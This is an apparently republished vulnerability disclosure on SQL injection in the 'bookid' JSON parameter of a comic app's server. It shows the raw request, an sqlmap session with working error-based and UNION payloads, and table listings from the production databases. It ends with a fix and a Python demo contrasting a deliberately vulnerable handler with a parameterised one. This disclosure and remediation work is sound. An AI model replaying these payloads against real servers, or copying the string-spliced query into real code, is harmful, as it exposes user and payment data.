Cartoon island Android app server SQL injection can cause user data and Server Information Leakage

Source: Internet
Author: User


Cartoon Island Android app server SQL injection
All user data and server information may be exposed.
Case study #01 of automated vulnerability discovery with the WooYun router
Can you hit a vulnerability just by using an app normally through the WooYun router?

Problematic URL: /comic/comicsupdateinfo_sb

Vulnerable parameter (POST body, JSON): bookid

Original request:

POST /comic/comicsupdateinfo_sb HTTP/1.1
accept: */*
connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
charset: utf-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; A0001 Build/LMY48Y)
Host: mhjk.1391.com
Accept-Encoding: gzip
Content-Length: 56

[{"updatetime":"2016-01-21 00:00:00","bookid":"166465"}]



Problem description: the bookid value in the JSON request body is not validated before it reaches the SQL query. The working payloads both begin with 166465') , so the value is placed inside a quoted, parenthesised string literal that the attacker can close and extend. The result is an SQL injection that exposes the database contents (MySQL, with the business, library and trade databases all reachable from the same connection).

Discovery process: the application was used normally behind the WooYun router, and Burp reported the vulnerability. It was verified with sqlmap before being submitted. Only the table names were retrieved as proof; no data was extracted.
$ sqlmap -l 001 --tables
         _
 ___ ___| |_____ ___ ___  {1.0-dev-f54b25c}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:22:24

[18:22:24] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
URL 1:
GET http://mhjk.1391.com:80/comic/comicsupdateinfo_sb
POST data: %5B%7B%22updatetime%22%3A%222016-01-21%2000%3A00%3A00%22%2C%22bookid%22%3A%22166465%2A%22%7D%5D
do you want to test this URL? [Y/n/q]
> y
[18:22:26] [INFO] testing URL 'http://mhjk.1391.com:80/comic/comicsupdateinfo_sb'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[18:22:27] [INFO] using '/home/alkaid/.sqlmap/output/results-01232016_0622pm.csv' as the CSV results file in multiple targets mode
[18:22:27] [INFO] testing connection to the target URL
[18:22:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[18:22:27] [INFO] testing if the target URL is stable
[18:22:28] [INFO] target URL is stable
[18:22:28] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[18:22:28] [WARNING] (custom) POST parameter '#1*' does not appear dynamic
[18:22:29] [INFO] heuristics detected web page charset 'ascii'
[18:22:29] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[18:22:29] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[18:22:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:22:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:22:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:22:29] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[18:22:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:22:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:22:33] [INFO] target URL appears to be UNION injectable with 8 columns
[18:22:34] [INFO] (custom) POST parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [{"updatetime":"2016-01-21 00:00:00","bookid":"166465') AND (SELECT 1617 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(1617=1617,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('azUG'='azUG"}]

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: [{"updatetime":"2016-01-21 00:00:00","bookid":"166465') UNION ALL SELECT CONCAT(0x71707a6a71,0x64674969486c6b76796567494d486f455443747975696171545466717153425a4c616a7a5a534f41,0x716b707871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"}]
---
do you want to exploit this SQL injection? [Y/n] y
[18:22:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[18:22:43] [INFO] fetching database names
[18:22:43] [INFO] fetching tables for databases: 'comic_biz, comic_library, comic_trade, information_schema, test'
Database: comic_biz
[95 tables]
+---------------------------------------+
| function                              |
| adgroup_info                          |
| admin_info                            |
| admin_log                             |
| adposition_info                       |
| album_bigbook_relation                |
| album_info                            |
| application                           |
| award_info                            |
| award_info_copy                       |
| bigbook_channel_relation              |
| bigbook_user_relation                 |
| blacklist_info                        |
| blacklist_info_copy                   |
| blog_at_relation                      |
| blog_info                             |
| blog_manage_log                       |
| blog_topic_relation                   |
| blogpic_info                          |
| blogpraise_info                       |
| blogrecommend_info                    |
| blogreply_info                        |
| book_channel_relation                 |
| bookpart_reading_log                  |
| channel_info                          |
| channel_tag_relation                  |
| community_info                        |
| community_section                     |
| community_section_user_relation       |
| config_info                           |
| cucc_order_info                       |
| cucc_user_info                        |
| discuss_error_info                    |
| discuss_extend_info                   |
| discuss_info                          |
| discuss_reply_adimgs_info             |
| discusspic                            |
| event_configs                         |
| feedback_info                         |
| filterwords_info                      |
| focuspicture_info                     |
| invitecode_info                       |
| invitecode_info_copy                  |
| iosdevice_info                        |
| jfq_iosdevice_info                    |
| keyword_info                          |
| list_bigbook_relation                 |
| page_discuss                          |
| page_discuss_extension                |
| picpackage                            |
| platform_version                      |
| praiseinfo                            |
| promotion_info                        |
| recommendauthor_info                  |
| recommendbook_info                    |
| recommendcategory_info                |
| recommendsubject_info                 |
| reply_info                            |
| role                                  |
| role_function_relation                |
| score_config                          |
| score_info                            |
| shop_info                             |
| special_bigbook_relation              |
| special_book_relation                 |
| special_description                   |
| special_info                          |
| subject_channel_relation              |
| t2                                    |
| tip_message_channel_relation          |
| tip_message_info                      |
| tip_messsage_plaform_version_relation |
| tmp_jfq                               |
| topic_info                            |
| tt                                    |
| user_expget_log                       |
| user_extend_info                      |
| user_info                             |
| user_invitecode_log                   |
| user_invitecode_log_copy              |
| user_login_log                        |
| user_reduce_log                       |
| user_role_relation                    |
| user_search_info                      |
| user_search_info_history              |
| user_token_info                       |
| useraward_log                         |
| useraward_log_copy                    |
| userawardnum_info                     |
| userfollow_info                       |
| version_info                          |
| wp_phone                              |
| wp_phone_book                         |
| wp_phone_push_log                     |
| znq_test                              |
+---------------------------------------+

Database: comic_library
[44 tables]
+---------------------------------------+
| admin_info                            |
| author_info                           |
| bigbook_author_relation               |
| bigbook_book_relation                 |
| bigbook_info                          |
| bigbook_jingpin                       |
| book_author_relation                  |
| book_info                             |
| book_jingpin                          |
| book_message_filter                   |
| book_message_info                     |
| book_temp_message_info                |
| booksource_primer                     |
| bookupdate_info                       |
| cdn_page_info                         |
| cdn_part_info                         |
| domainconfig                          |
| lightbook                             |
| lightchapter                          |
| lightpart                             |
| message_template                      |
| page_info                             |
| page_size_info                        |
| part_info                             |
| part_test                             |
| sourcecomics_info                     |
| sourcecomics_info_relation            |
| sourcesbook_down                      |
| sourcesbook_downid                    |
| subject_info                          |
| tempexecute                           |
| test                                  |
| test_author                           |
| test_fan                              |
| test_sourceratio                      |
| test_top150                           |
| test_top500                           |
| test_zymk                             |
| tmp_cdnpart                           |
| toudi_account                         |
| toudi_partinfo                        |
| wp_phone                              |
| wp_phone_book                         |
| wp_phone_push_log                     |
+---------------------------------------+

Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: comic_trade
[86 tables]
+---------------------------------------+
| attentive_prompt                      |
| book_chapter_discount_history         |
| book_chapter_price_history            |
| book_discount_history                 |
| book_price                            |
| book_price_history                    |
| channel_contract_history              |
| chapter_price                         |
| product_as_info                       |
| product_category_as_info              |
| product_discount_history              |
| product_duration_as_history           |
| product_info                          |
| product_price_history                 |
| sign_setting                          |
| sign_setting_as                       |
| system_account_as_history             |
| system_account_history                |
| user_account_as_info                  |
| user_account_info                     |
| user_deposit_as_history               |
| user_deposit_history                  |
| user_order_0                          |
| user_order_1                          |
| user_order_2                          |
| user_order_3                          |
| user_order_4                          |
| user_order_5                          |
| user_order_6                          |
| user_order_7                          |
| user_order_8                          |
| user_order_9                          |
| user_order_as_0                       |
| user_order_as_1                       |
| user_order_as_2                       |
| user_order_as_3                       |
| user_order_as_4                       |
| user_order_as_5                       |
| user_order_as_6                       |
| user_order_as_7                       |
| user_order_as_8                       |
| user_order_as_9                       |
| user_order_detail_0                   |
| user_order_detail_1                   |
| user_order_detail_2                   |
| user_order_detail_3                   |
| user_order_detail_4                   |
| user_order_detail_5                   |
| user_order_detail_6                   |
| user_order_detail_7                   |
| user_order_detail_8                   |
| user_order_detail_9                   |
| user_order_detail_as_0                |
| user_order_detail_as_1                |
| user_order_detail_as_2                |
| user_order_detail_as_3                |
| user_order_detail_as_4                |
| user_order_detail_as_5                |
| user_order_detail_as_6                |
| user_order_detail_as_7                |
| user_order_detail_as_8                |
| user_order_detail_as_9                |
| user_order_present_0                  |
| user_order_present_1                  |
| user_order_present_2                  |
| user_order_present_3                  |
| user_order_present_4                  |
| user_order_present_5                  |
| user_order_present_6                  |
| user_order_present_7                  |
| user_order_present_8                  |
| user_order_present_9                  |
| user_order_present_as_0               |
| user_order_present_as_1               |
| user_order_present_as_2               |
| user_order_present_as_3               |
| user_order_present_as_4               |
| user_order_present_as_5               |
| user_order_present_as_6               |
| user_order_present_as_7               |
| user_order_present_as_8               |
| user_order_present_as_9               |
| user_present_as_history               |
| user_present_history                  |
| vwIOSUserMonthlyOrder                 |
| vwUserMonthlyOrder                    |
+---------------------------------------+

[18:22:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[18:22:43] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/alkaid/.sqlmap/output/results-01232016_0622pm.csv'





Appendix: the WooYun router working together with Burp's vulnerability alert (sqlmap is then used to assess the impact based on that result).
 

 

Solution:

Validate both JSON parameters (bookid and updatetime) against the format the application actually expects, and pass them to the database as bound query parameters rather than concatenating them into the SQL text. Filtering alone is fragile; the bound parameter is what stops the 166465') prefix from closing the string literal.
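The following is an added example, not code from the report or from the app's server (whose language and schema the page does not show). It reproduces the problem described above and the fix: the JSON body is parsed, and in the vulnerable handler the bookid value is spliced into a query that wraps it in a quoted, parenthesised literal, which is the shape inferred from the 166465') prefix of sqlmap's payloads. The hardened handler validates both fields and binds them as parameters. The database is an in-memory SQLite stand-in for the real MySQL backend; the table name bookupdate_info comes from the sqlmap listing, while its columns, rows, the query text and the function names are assumptions for the demonstration. The attack body is constructed here in the shape of sqlmap's UNION payload and reads the schema catalogue (sqlite_master here, INFORMATION_SCHEMA on MySQL), which is what --tables did in the report.

```python
import json
import re
import sqlite3


def make_db():
    """Constructed stand-in for the backend: one assumed table with the
    name seen in the sqlmap listing, columns and rows invented for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE bookupdate_info (bookid TEXT, updatetime TEXT, title TEXT)"
    )
    conn.executemany(
        "INSERT INTO bookupdate_info VALUES (?, ?, ?)",
        [
            ("166465", "2016-01-22 10:00:00", "Book A"),
            ("166466", "2016-01-25 10:00:00", "Book B"),
            ("200000", "2016-01-10 10:00:00", "Book C"),
        ],
    )
    return conn


# The request body exactly as the app sends it (taken from the report).
LEGIT_BODY = '[{"updatetime":"2016-01-21 00:00:00","bookid":"166465"}]'

# Constructed attack body in the shape of sqlmap's UNION payload: close the
# quoted, parenthesised literal with  ')  and append a UNION that reads the
# schema catalogue. "-- -" comments out the rest of the original query.
INJECTED_BODY = json.dumps([{
    "updatetime": "2016-01-21 00:00:00",
    "bookid": "166465') UNION ALL SELECT name, sql FROM sqlite_master-- -",
}])


def updates_vulnerable(conn, body):
    """Assumed shape of the vulnerable handler: JSON values are spliced
    straight into the SQL text, so the  ')  in bookid ends the literal."""
    rows = []
    for item in json.loads(body):
        sql = (
            "SELECT bookid, title FROM bookupdate_info "
            "WHERE (bookid = '%s') AND updatetime > '%s'"
            % (item["bookid"], item["updatetime"])
        )
        rows.extend(conn.execute(sql).fetchall())
    return rows


# Strict formats for the two JSON fields (assumed: bookid is a decimal id,
# updatetime is "YYYY-MM-DD HH:MM:SS" as in the captured request).
_BOOKID_RE = re.compile(r"\d{1,10}")
_DATETIME_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")


def updates_fixed(conn, body):
    """Hardened handler: validate both JSON fields against a strict format
    and bind them as query parameters, never as SQL text."""
    rows = []
    for item in json.loads(body):
        bookid = item.get("bookid")
        updatetime = item.get("updatetime")
        if not (isinstance(bookid, str) and _BOOKID_RE.fullmatch(bookid)):
            raise ValueError("bookid must be a decimal string")
        if not (isinstance(updatetime, str) and _DATETIME_RE.fullmatch(updatetime)):
            raise ValueError("updatetime must be YYYY-MM-DD HH:MM:SS")
        rows.extend(
            conn.execute(
                "SELECT bookid, title FROM bookupdate_info "
                "WHERE (bookid = ?) AND updatetime > ?",
                (bookid, updatetime),
            ).fetchall()
        )
    return rows


def rejects(handler, conn, body):
    """True if the handler refuses the body with ValueError."""
    try:
        handler(conn, body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("legit body, vulnerable handler:", updates_vulnerable(db, LEGIT_BODY))
    print("attack body, vulnerable handler:", updates_vulnerable(db, INJECTED_BODY))
    print("legit body, fixed handler:", updates_fixed(db, LEGIT_BODY))
    print("attack body rejected by fixed handler:", rejects(updates_fixed, db, INJECTED_BODY))
```

Run against the constructed database, the vulnerable handler returns the schema row for bookupdate_info alongside the legitimate result, which is the same class of leak the report demonstrates with --tables; the fixed handler returns the legitimate row for the real request and refuses the attack body before any SQL is built. Even without the format check, the bound parameter on its own would make the attack string match nothing, so validation here is defence in depth rather than the primary control.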
